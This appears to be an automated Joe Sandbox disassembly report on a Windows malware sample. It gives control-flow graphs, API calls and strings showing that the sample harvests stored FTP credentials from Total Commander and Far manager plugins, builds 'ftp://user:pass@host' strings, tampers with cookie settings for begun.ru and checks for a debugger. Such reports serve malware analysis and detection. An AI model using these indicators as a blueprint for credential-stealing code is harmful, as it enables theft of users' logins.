                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                  • String ID: c{@
                                                                                                                                                                                                  • API String ID: 3735792614-264719814
                                                                                                                                                                                                  • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                  • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                  • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                  • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetForegroundWindow.USER32(00427ED0,00427ED0,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A065
                                                                                                                                                                                                  • CoCreateInstance.OLE32(0040E218,00000000,00000015,0040E238,00000001,?,?,?,0040A17D,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A07E
                                                                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0040A088
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ForegroundWindow$CreateInstance
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2498160819-0
                                                                                                                                                                                                  • Opcode ID: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                                                                                                                                                                                                  • Instruction ID: 3fc8f4a2167e7ffe653cafe2f971d35c6ed40139ecea7ac55ee7c5b8babae7fd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82b24d427a4319f76012a439117db5c4ff365e6f2f98325e2b41cf4565e173f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8F03C71640208FFD7049FA6CD8DC5ABBFCEF9970172009AAF101EB290D6755950DA25
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00406CCF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                  • Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                                                                                                                                                                                                  • Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                                                                                                                                                                                                  • Instruction ID: 218ff2483168da8b183dc8d255f139c90e55d0551e3cd34b08f9c15d5f680e8f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB423CB6E413099FDB08CFD6D8C09DCB7B3FFD8314B1A91A9C505A7316D6B87A068A50

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 129 402e3e-402e59 call 40d5b0 132 40327e-403286 129->132 133 402e5f-402e60 129->133 134 402e61-402ea5 call 40586b call 4058fb 133->134 139 402eb4 134->139 140 402ea7-402ead 134->140 142 402eb7-402ecb GetModuleFileNameW 139->142 140->139 141 402eaf-402eb2 140->141 141->142 143 402ed6-402edc GetCurrentDirectoryW 142->143 144 402ecd-402ed4 call 406cf9 142->144 146 402ee2-402f14 call 405511 call 4054ed * 2 143->146 144->146 154 402f16-402f22 call 405467 146->154 155 402f2a-402f94 GetLastError call 40a786 call 407552 call 405511 call 40584d 146->155 154->155 160 402f24 154->160 167 402f96-402fa6 155->167 168 402fa8 call 4056f9 155->168 160->155 169 402fad-402fd8 call 4054ed * 2 call 40584d 167->169 168->169 177 402fda-402fea 169->177 178 402fec call 4056f9 169->178 179 402ff1-403038 call 4054ed * 2 call 405511 call 4054ed 177->179 178->179 189 40303a-40304a 179->189 190 40304c call 4056f9 179->190 191 403051-403081 call 4054ed * 3 call 40584d 189->191 190->191 201 403083-403093 191->201 202 403095-40309b call 4056f9 191->202 204 4030a0-403132 call 405451 call 406d42 call 405511 call 4054ed * 4 call 40253c 201->204 202->204 221 403251-40325f GetLastError 204->221 222 403138-40313e 204->222 225 403262-403276 call 40a786 221->225 223 403144-403148 222->223 224 40322d-403235 222->224 223->224 228 40314e-403186 call 40584d call 407552 call 405511 call 40584d 223->228 226 403241 224->226 227 403237-40323f GetLastError 224->227 225->134 234 40327c-40327d 225->234 230 403244-40324f 226->230 227->230 241 403188-403198 228->241 242 40319a call 4056f9 228->242 230->225 234->132 243 40319f-4031c8 call 4054ed * 2 call 40584d 241->243 242->243 251 4031ca-4031da 243->251 252 4031dc call 4056f9 243->252 253 4031e1-403228 call 4054ed * 2 call 40253c 251->253 252->253 253->221 261 40322a 253->261 261->224
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                                                                                                                                                                                                  • GetLastError.KERNEL32(?), ref: 00402F4E
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00403237
                                                                                                                                                                                                  • GetLastError.KERNEL32(?), ref: 00403258
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                                                                                                                                                                                                  • String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
                                                                                                                                                                                                  • API String ID: 2247176544-2288798624
                                                                                                                                                                                                  • Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                                                                                                                                                                                                  • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 307 40b096-40b0ac call 40d5b0 310 40b0b5-40b0bb 307->310 311 40b0ae-40b0b0 307->311 313 40b0bd-40b0cd call 407995 310->313 314 40b0cf-40b0d1 call 407951 310->314 312 40b2c9-40b2cd 311->312 318 40b0d6-40b0e5 313->318 314->318 319 40b160-40b166 318->319 320 40b0e7-40b0f1 318->320 321 40b177 InternetClearAllPerSiteCookieDecisions 319->321 322 40b168-40b175 InternetSetPerSiteCookieDecisionW 319->322 320->319 323 40b0f3-40b0f9 320->323 324 40b17d-40b184 call 4032b8 321->324 322->324 323->319 325 40b0fb-40b10b GetModuleFileNameW 323->325 333 40b186-40b196 GetLastError call 40a786 324->333 334 40b199-40b1a2 324->334 327 40b116-40b118 GetCurrentDirectoryW 325->327 328 40b10d-40b114 call 406cf9 325->328 329 40b11e-40b15a call 405511 call 4054ed call 40253c 327->329 328->329 329->311 329->319 333->334 336 40b1a9-40b1ae 334->336 339 40b1b0-40b1cd CreateThread 336->339 340 40b1ce-40b1df 336->340 339->340 340->336 343 40b1e1-40b1e7 340->343 345 40b1e9-40b1eb 343->345 346 40b1ed-40b200 call 40a786 343->346 345->346 348 40b221-40b226 345->348 355 40b202-40b209 call 40b023 346->355 356 40b20e-40b210 346->356 352 40b228-40b23b CloseHandle 348->352 353 40b23d-40b24b call 40a6c9 InternetClearAllPerSiteCookieDecisions 348->353 352->352 352->353 360 40b2c6-40b2c8 353->360 361 40b24d-40b257 353->361 355->356 356->348 359 40b212-40b21b WaitForMultipleObjects 356->359 359->348 360->312 361->360 362 40b259-40b25f 361->362 362->360 363 40b261-40b271 GetModuleFileNameW 362->363 364 40b273-40b27a call 406cf9 363->364 365 40b27c-40b27e GetCurrentDirectoryW 363->365 367 40b284-40b2c0 call 405511 call 4054ed call 40253c 364->367 365->367 367->311 367->360
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                                                                                                                                                                                                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                                                                                                                                                                                                  • String ID: \netprotdrvss.exe$begun.ru
                                                                                                                                                                                                  • API String ID: 2887986221-2660752650
                                                                                                                                                                                                  • Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                                                                                                                                                                                                  • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 375 403c10-403c73 call 40be9d call 405511 * 2 call 40848f 384 403c75-403c77 375->384 385 403ca9-403cad 375->385 384->385 386 403c79-403c94 ExpandEnvironmentStringsW 384->386 387 403cb3-403d15 call 405511 * 3 385->387 388 403dfe 385->388 389 403c95 call 4039ea 386->389 404 403d18-403d34 SHGetFolderPathW 387->404 390 403e00-403e08 call 4033a0 388->390 391 403e0a-403e12 call 40be3a 388->391 393 403c9a-403ca3 PathRemoveFileSpecW 389->393 400 403e13-403e17 390->400 391->400 393->385 405 403d36-403d39 404->405 406 403d7f-403d86 404->406 407 403d5a 405->407 408 403d3b-403d58 call 4039a3 405->408 406->404 409 403d88-403d8c 406->409 411 403d5c-403d76 407->411 408->411 409->388 412 403d8e-403dce call 405511 * 2 call 40848f 409->412 414 403d77 call 408248 411->414 422 403dd0-403dd2 412->422 423 403dfa 412->423 416 403d7c 414->416 416->406 422->423 424 403dd4-403df7 ExpandEnvironmentStringsW call 4039a3 422->424 423->388 424->423
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                                                                                                                                                                                                    • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                    • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                                                                                                                                                                                                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                                                                                                                                                                                                  • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                                                                                                                                                                                                  • API String ID: 2046068145-3914982127
                                                                                                                                                                                                  • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                  • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 437 4027e6-402809 OleInitialize call 40a469 440 402813-402819 437->440 441 40280b-40280e 437->441 443 402820-402832 call 405511 440->443 444 40281b-40281e 440->444 442 402c2d-402c31 441->442 445 402838-40284f call 40a345 443->445 444->443 444->445 450 402851 445->450 451 40285f-402862 445->451 454 402852 call 40a65e 450->454 452 402864-402867 451->452 453 402869 451->453 452->453 455 402879-40287d 452->455 456 402869 call 4072ed 453->456 457 402857-40285a 454->457 460 40287f call 409f2b 455->460 459 40286e-402873 456->459 458 402c2c 457->458 458->442 459->455 461 402884-402888 460->461 462 402893-4028a0 461->462 463 40288a-40288d 461->463 465 4028a2-4028ad 462->465 466 4028b7-4028be 462->466 463->462 464 40296a 463->464 467 402970-402978 464->467 468 4028af call 408f26 465->468 466->464 469 4028c4-4028cc 466->469 470 402c20-402c23 467->470 471 40297e-402984 467->471 472 4028b4 468->472 473 4028d3-4028e3 469->473 474 4028ce 469->474 476 402c25 call 40a65e 470->476 477 402986-4029a2 call 40a569 471->477 478 4029bc-4029c0 471->478 472->466 475 4028e5 call 408f26 473->475 474->473 479 4028ea-4028ef 475->479 480 402c2a 476->480 493 4029a5 call 4089fd 477->493 482 4029c2-4029de call 40a569 478->482 483 4029f8-4029fc 478->483 486 4028f1-402925 call 407573 SysAllocString 479->486 487 402956-402957 479->487 480->458 501 4029e1 call 4089fd 482->501 484 402a04-402a0c 483->484 485 4029fe-402a02 483->485 490 402a3b-402a44 484->490 491 402a0e-402a35 call 40920a call 409c49 SysAllocString SysFreeString 484->491 485->484 485->490 504 402927-402938 SysFreeString 486->504 505 40293a-402941 486->505 495 402959 call 40a65e 487->495 499 402a46-402a5a 490->499 500 402a6f-402a73 490->500 491->490 498 4029aa-4029b8 493->498 502 40295e 495->502 498->478 506 402a5d call 408f26 499->506 507 402aa2-402aa6 500->507 508 402a75-402a8d 500->508 509 4029e6-4029f4 501->509 502->464 504->504 504->505 513 402943-402945 505->513 514 402947-40294a call 4091bd 505->514 515 402a62-402a6c SysAllocString 506->515 510 402ad1-402ad5 507->510 511 402aa8-402abc 507->511 516 402a90 call 408f26 508->516 509->483 518 402b04-402b07 510->518 519 402ad7-402aef 510->519 517 402abf call 408f26 511->517 521 40294f-402954 513->521 514->521 515->500 523 402a95-402a9f SysAllocString 516->523 524 402ac4-402ace SysAllocString 517->524 526 402b09 call 40a65e 518->526 525 402af2 call 408f26 519->525 521->467 523->507 524->510 527 402af7-402b01 SysAllocString 525->527 528 402b0e-402b11 526->528 527->518 529 402b13 528->529 530 402b1a-402b2d 528->530 529->530 531 402b49-402b4d 530->531 532 402b2f-402b47 call 407573 530->532 533 402b55-402b66 call 407573 call 409c49 531->533 534 402b4f-402b53 531->534 532->531 537 402b6b-402b6f 533->537 534->533 534->537 540 402b71-402b7e call 40584d call 409c49 537->540 541 402b83-402b87 537->541 540->541 544 402b89-402b9c call 407573 541->544 545 402b9e-402ba2 541->545 544->545 546 402ba4-402bad call 40584d 545->546 547 402baf-402be1 call 40584d 545->547 546->547 556 402be3-402be8 call 408825 547->556 557 402bea call 408692 547->557 561 402bef-402bf8 556->561 557->561 562 402bfa-402bfd 561->562 563 402bff 561->563 562->563 564 402c01-402c0f SysFreeString 562->564 563->564 564->470 565 402c11-402c1e SysFreeString 564->565 565->470 565->565
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004027F5
                                                                                                                                                                                                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Internet$InitializeOpenOption
                                                                                                                                                                                                  • String ID: From: true
                                                                                                                                                                                                  • API String ID: 1176259655-9585188
                                                                                                                                                                                                  • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                                                                                                                                                                                                  • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 566 4041e4-40420c HeapAlloc 567 404212-40429b call 405511 * 2 call 40be9d call 405511 * 4 566->567 568 40445e-404462 566->568 583 4042a0-4042bb RegOpenKeyExW 567->583 584 404430-404437 583->584 585 4042c1-4042d4 583->585 584->583 587 40443d-404449 call 40be3a 584->587 586 40440f-404421 RegEnumKeyExW 585->586 588 404427-40442a RegCloseKey 586->588 589 4042d9-4042fc call 40848f 586->589 594 404455-40445d call 40be3a 587->594 595 40444b-404453 call 4033a0 587->595 588->584 596 404302-404304 589->596 597 4043fd-40440c 589->597 594->568 595->568 596->597 600 40430a-40432d call 40848f 596->600 597->586 605 404333-404350 call 40848f 600->605 606 40432f-404331 600->606 605->597 614 404356-404358 605->614 606->605 607 40435e-40437b RegOpenKeyExW 606->607 609 404395 607->609 610 40437d-404393 call 40845d 607->610 613 404398-40439e 609->613 610->613 613->597 616 4043a0-4043a2 613->616 614->597 614->607 616->597 617 4043a4-4043ae call 404189 616->617 617->597 620 4043b0-4043ea call 405511 call 40c3f9 617->620 620->597 625 4043ec-4043f8 call 40c00b 620->625 625->597 628 4043fa 625->628 628->597
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040442A
                                                                                                                                                                                                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HeapOpen$AllocCloseEnumFree
                                                                                                                                                                                                  • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                                                                                                                                                                                                  • API String ID: 416369273-4007225339
                                                                                                                                                                                                  • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                  • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
